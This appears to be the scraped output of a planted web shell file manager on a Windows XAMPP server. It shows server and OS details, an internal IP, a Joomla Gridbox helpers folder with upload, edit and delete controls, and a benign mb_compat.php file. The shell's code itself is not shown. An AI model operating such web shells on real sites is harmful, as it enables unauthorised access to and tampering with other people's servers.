[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
components
/
com_gridbox
/
helpers
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 assets.php
5,877 B
SET
[ EDIT ]
|
[ DEL ]
📄 association.php
5,862 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.html
33 B
SET
[ EDIT ]
|
[ DEL ]
📄 mb_compat.php
1,517 B
SET
[ EDIT ]
|
[ DEL ]
📄 seo.php
13,491 B
SET
[ EDIT ]
|
[ DEL ]
📄 sitemap.php
16,082 B
SET
[ EDIT ]
|
[ DEL ]
📄 store.php
97,136 B
SET
[ EDIT ]
|
[ DEL ]
📄 uploader.php
18,577 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: mb_compat.php
<?php /** * @package Gridbox * @author Balbooa http://www.balbooa.com/ * @copyright Copyright @ Balbooa * @license http://www.gnu.org/licenses/gpl.html GNU/GPL */ defined('_JEXEC') or die; if (!function_exists('mb_strtolower')) { function mb_strtolower($str, $encoding = 'utf-8') { return strtolower($str); } } if (!function_exists('mb_strlen')) { function mb_strlen($str) { return strlen($str); } } if (!function_exists('mb_substr')) { function mb_substr($str, $start, $length = 0, $encoding = 'utf-8') { return substr($str, $start, $length); } } if (!function_exists('mb_substr')) { function mb_strpos($haystack, $needle, $offset = 0, $encoding = 'utf-8') { return strpos($haystack, $needle, $offset); } } if (!function_exists('mb_strtoupper')) { function mb_strtoupper($string, $encoding = 'UTF-8') { return strtoupper($string); } } if (!function_exists('mb_strtolower')) { function mb_strtolower($string, $encoding = 'UTF-8') { return strtolower($string); } } if (!function_exists('mb_ucfirst')) { function mb_ucfirst($string, $encoding = 'UTF-8') { $strlen = mb_strlen($string, $encoding); $firstChar = mb_substr($string, 0, 1, $encoding); $then = mb_substr($string, 1, $strlen - 1, $encoding); return mb_strtoupper($firstChar, $encoding).mb_strtolower($then, $encoding); } }